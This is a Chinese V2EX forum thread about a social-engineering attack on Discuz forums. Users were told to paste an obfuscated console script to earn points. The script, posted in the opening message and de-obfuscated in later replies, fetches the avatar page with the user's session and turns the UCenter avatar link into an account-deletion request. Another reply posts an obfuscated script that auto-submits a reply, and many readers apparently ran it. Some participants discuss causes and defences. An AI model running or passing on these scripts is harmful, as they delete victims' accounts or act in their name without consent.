V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
Event
V2EX  ›  信息安全

discuz 漏洞真 j8 多 有人在我论坛搞事情。。。传播一段 js 把我论坛搞炸了

  •  
  •   Event · 2018-11-11 23:15:27 +08:00 via Android · 9338 次点击
    这是一个创建于 2233 天前的主题,其中的信息可能已经有所发展或是发生改变。
    这两天有人在我站水帖。。。。。告诉别的用户在 console 执行一段脚本能领到积分。。结果他们自己账号变得乱七八糟的了。。。
    废话不说。。。上代码 你们自己看看

    location['\x68\x72\x65\x66']=((d=(await(await fetch("\x2e\x2f\x68\x6f\x6d\x65\x2e\x70\x68\x70\x3f\x6d\x6f\x64\x3d\x73\x70\x61\x63\x65\x63\x70\x26\x61\x63\x3d\x61\x76\x61\x74\x61\x72",{credentials:'\x69\x6e\x63\x6c\x75\x64\x65'}))['\x74\x65\x78\x74']())['\x6d\x61\x74\x63\x68'](/\/\/\S+\/images\/ca\S+&ag/g)[0]['\x72\x65\x70\x6c\x61\x63\x65']('\x69\x6d\x61\x67\x65\x73\x2f\x63\x61\x6d\x65\x72\x61\x2e\x73\x77\x66\x3f','\x3f\x6d\x3d\x75\x73\x65\x72\x26\x61\x3d\x64\x65\x6c\x65\x74\x65\x26'))&&confirm('\u7eff\u5b9d\u77f3'))?d:'';
    56 条回复    2020-11-29 13:10:48 +08:00
    Event
        1
    Event  
    OP
       2018-11-11 23:16:11 +08:00 via Android
    具体账号发生了什么神奇的变化。。 你们自己试试看吧 我很无奈 。。
    Event
        2
    Event  
    OP
       2018-11-11 23:16:39 +08:00 via Android
    而且貌似不是软层的。。。直接从 sql 层干掉了?
    Event
        3
    Event  
    OP
       2018-11-11 23:22:40 +08:00 via Android
    哦对。。输完后退出帐号 重新登录才能看到效果
    chinvo
        4
    chinvo  
       2018-11-11 23:28:37 +08:00 via iPhone
    suit
        5
    suit  
       2018-11-11 23:29:37 +08:00
    没有变化
    Event
        6
    Event  
    OP
       2018-11-11 23:31:50 +08:00 via Android
    @suit 重新登录看看你就知道了
    Event
        7
    Event  
    OP
       2018-11-11 23:32:10 +08:00 via Android
    @chinvo
    emmmm 咋了 这里不允许讨论 bug 吗。。。
    suit
        8
    suit  
       2018-11-11 23:32:51 +08:00
    @Event 已经重登了
    Event
        9
    Event  
    OP
       2018-11-11 23:33:59 +08:00 via Android
    @suit 我在 dz 的 oschina 里面找到了 issue。。。貌似是个 ucenter 的 bug
    Event
        10
    Event  
    OP
       2018-11-11 23:34:22 +08:00 via Android
    @suit 貌似是要 chrome 才行 会弹出一个确认框。。
    chinvo
        11
    chinvo  
       2018-11-11 23:43:24 +08:00 via iPhone
    @chinvo #4 抱歉,你这种描述方式太像那些 6 和彩的假新闻广告了,一时误认
    ScotGu
        12
    ScotGu  
       2018-11-11 23:47:01 +08:00
    @Event #7 并不是不允许讨论 BUG。
    而是你的讨论方式有点操蛋。

    在 DZ 论坛执行这段代码基本就是“自杀”。而你怂恿他人去尝试执行。并且未加任何警示标识和标识。
    V2 是一个被秒收录的站点,很多小白来这里学习,如果小白好奇去执行了这段脚本,由此造成的后或你会负责么?

    @Livid 建议屏蔽危险代码。
    t6attack
        13
    t6attack  
       2018-11-11 23:47:50 +08:00
    location['href'] = ((d = (await(await fetch("./home.php?mod=spacecp&ac=avatar", {
    credentials: 'include'
    }))['text']())['match'](/\/\/\S+\/images\/ca\S+&ag/g)[0]['replace']('images/camera.swf?', '?m=user&a=delete&')) && confirm('绿宝石')) ? d : '';
    t6attack
        14
    t6attack  
       2018-11-11 23:57:12 +08:00
    让用户自己执行动作代码,这,,这算漏洞?!下面代码可以在 v2 执行
    $("\x23\x72\x65\x70\x6c\x79\x5f\x63\x6f\x6e\x74\x65\x6e\x74")["\x76\x61\x6c"]("\u6240\u4ee5\u4f60\u4eec\u5230\u5e95\u5acc\x4a\x53\u6743\u9650\u592a\u5927\u8fd8\u662f\u592a\u5c0f\u4e86\uff1f\uff1f");$("\x23\x72\x65\x70\x6c\x79\x5f\x63\x6f\x6e\x74\x65\x6e\x74")["\x70\x61\x72\x65\x6e\x74"]()["\x73\x75\x62\x6d\x69\x74"]();
    mengyaoss77
        15
    mengyaoss77  
       2018-11-12 00:01:33 +08:00
    所以你们到底嫌 JS 权限太大还是太小了??
    dot2017
        16
    dot2017  
       2018-11-12 00:01:37 +08:00   ❤️ 1
    这个 bug 老早就有了,利用 uc 头像删除自己的账号。临时解决办法是切换到 H5 头像模式,X3.4 自带了
    Event
        17
    Event  
    OP
       2018-11-12 00:02:08 +08:00
    @ScotGu 是的。。很有危害性 所以我混淆了啊 防止别人乱改

    @t6attack 重要的不是执行 是这个功能 毁灭性的
    Event
        18
    Event  
    OP
       2018-11-12 00:03:33 +08:00
    @mengyaoss77 是程序权限没控制好
    Perry
        19
    Perry  
       2018-11-12 00:03:48 +08:00 via iPhone
    这是 social engineering 不是 bug
    mengyaoss77
        20
    mengyaoss77  
       2018-11-12 00:04:41 +08:00
    @Event #18 这是我执行 14 楼的代码自动回复的
    Event
        21
    Event  
    OP
       2018-11-12 00:04:53 +08:00
    @Perry 感觉小白不清楚会出事情
    airyland
        22
    airyland  
       2018-11-12 00:33:03 +08:00
    所以你们到底嫌 JS 权限太大还是太小了??
    airyland
        23
    airyland  
       2018-11-12 00:34:07 +08:00
    试了楼上的代码,自动发出回复了。。
    crab
        24
    crab  
       2018-11-12 00:38:22 +08:00
    crab
        25
    crab  
       2018-11-12 00:38:36 +08:00   ❤️ 3
    KasuganoSoras
        26
    KasuganoSoras  
       2018-11-12 03:46:02 +08:00 via Android
    这个 bug 老早就有了,我成功删了自己在很多论坛的账号。
    不过我现在都自己开发论坛了,不用 Discuz
    kzfile
        27
    kzfile  
       2018-11-12 07:55:46 +08:00
    所以你们到底嫌 JS 权限太大还是太小了??
    murmur
        28
    murmur  
       2018-11-12 08:09:25 +08:00
    为什么那么多网站都在 console 里打东西提醒用户不要执行陌生人发来的代码
    ThirdFlame
        29
    ThirdFlame  
       2018-11-12 08:41:49 +08:00
    人肉型 CSRF
    lixueyu001
        30
    lixueyu001  
       2018-11-12 08:45:24 +08:00
    所以你们到底嫌 JS 权限太大还是太小了??
    bojackhorseman
        31
    bojackhorseman  
       2018-11-12 08:49:18 +08:00
    所以你们到底嫌 JS 权限太大还是太小了??
    v9ex
        32
    v9ex  
       2018-11-12 08:51:32 +08:00
    $("\x23\x72\x65\x70\x6c\x79\x5f\x63\x6f\x6e\x74\x65\x6e\x74")["\x76\x61\x6c"]("\u6240\u4ee5\u4f60\u4eec\u5230\u5e95\u5acc\x4a\x53\u6743\u9650\u592a\u5927\u8fd8\u662f\u592a\u5c0f\u4e86\uff1f\uff1f");$("\x23\x72\x65\x70\x6c\x79\x5f\x63\x6f\x6e\x74\x65\x6e\x74")["\x70\x61\x72\x65\x6e\x74"]()["\x73\x75\x62\x6d\x69\x74"]();
    Removable
        33
    Removable  
       2018-11-12 08:57:24 +08:00
    所以你们到底嫌 JS 权限太大还是太小了??
    respect11
        34
    respect11  
       2018-11-12 08:58:39 +08:00 via iPhone
    所以你们到底嫌 JS 权限太大还是太小了??
    s527332935
        35
    s527332935  
       2018-11-12 09:07:54 +08:00
    所以你们到底嫌 JS 权限太大还是太小了??
    Lebal
        36
    Lebal  
       2018-11-12 09:14:33 +08:00
    所以你们到底嫌 JS 权限太大还是太小了??
    FakeLeung
        37
    FakeLeung  
       2018-11-12 09:16:14 +08:00
    location['href']=(
    (d=(await(await fetch("./home.php?mod=spacecp&ac=avatar", {credentials: 'include'})['text']())['match'](/\/\/\S+\/images\/ca\S+&ag/g)[0]['replace']('images/camera.swf?', '?m=user&a=delete&')&&confirm('绿宝石'))?d:'';



    来来来,大神们分析一下,这是 js 的问题还是后端的问题?
    @respect11
    @Removable
    @bojackhorseman
    @lixueyu001
    @airyland
    autoxbc
        38
    autoxbc  
       2018-11-12 09:38:44 +08:00
    其实是人的问题,在微利下人就失去理智,罔顾不懂的事情不要做的常识,跟技术没半点关系
    crystom
        39
    crystom  
       2018-11-12 10:22:43 +08:00
    所以你们到底嫌 JS 权限太大还是太小了??
    cookii
        40
    cookii  
       2018-11-12 11:36:31 +08:00
    所以你们到底嫌 JS 权限太大还是太小了??
    exceloo
        41
    exceloo  
       2018-11-12 11:38:54 +08:00
    这和 js 有半毛钱关系,只是诱导用户自己去删除帐号罢了。前端发的请求,js 都能模拟,用户自己作死去跑莫名其妙的代码你再牛逼也防不住啊。客户端执行的,又不是在服务端,还能咋办
    simple11
        42
    simple11  
       2018-11-12 11:43:36 +08:00
    所以你们到底嫌 JS 权限太大还是太小了??
    Event
        43
    Event  
    OP
       2018-11-12 12:49:29 +08:00
    @exceloo 可问题是为何会给用户删除自己账号的权限 而且没有什么防范
    hero2040407
        44
    hero2040407  
       2018-11-12 12:50:18 +08:00
    所以说删除用户这种操作需要一个提醒吧,点一下就直接删掉了?
    exceloo
        45
    exceloo  
       2018-11-12 13:10:47 +08:00
    @Event hmmmm 这的确是个问题
    coolloves
        46
    coolloves  
       2018-11-12 13:19:52 +08:00
    我擦,楼主好歹说下,运行的后果啊,我刚运行了下把我的账号给删掉了..................
    onionnews
        47
    onionnews  
       2018-11-12 15:44:47 +08:00
    想利用这个代码删掉那些论坛账号的,但是我执行了不管用,跳转到 500 了。是程序版本问题?
    kn007
        48
    kn007  
       2018-11-12 15:51:41 +08:00
    好久前就见过了,DZ 一直没修复。
    roryzh
        49
    roryzh  
       2018-11-12 16:08:09 +08:00
    所以你们到底嫌 JS 权限太大还是太小了??
    Jiaming
        50
    Jiaming  
       2018-11-13 09:00:23 +08:00
    所以你们到底嫌 JS 权限太大还是太小了??
    roryzh
        51
    roryzh  
       2018-11-13 17:16:15 +08:00
    所以你们到底嫌 JS 权限太大还是太小了??
    Fakey2
        52
    Fakey2  
       2018-12-07 12:21:48 +08:00
    这不是漏洞,这只是诱导类似钓鱼了,安全意识薄弱的人才会上当,根本也不是 DZ 本身的漏洞。。。我让你在 console 执行你就执行,这不是傻子行为么。。。所以跟 DZ 本身没关系。。。
    xemtof
        53
    xemtof  
       2019-01-09 18:59:34 +08:00
    所以你们到底嫌 JS 权限太大还是太小了??
    771456556
        54
    771456556  
       2019-05-16 10:27:08 +08:00
    所以你们到底嫌 JS 权限太大还是太小了??
    xmdhs
        55
    xmdhs  
       2020-02-26 22:17:41 +08:00
    所以你们到底嫌 JS 权限太大还是太小了??
    binnerchen
        56
    binnerchen  
       2020-11-29 13:10:48 +08:00
    所以你们到底嫌 JS 权限太大还是太小了??
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   3672 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 26ms · UTC 04:23 · PVG 12:23 · LAX 20:23 · JFK 23:23
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.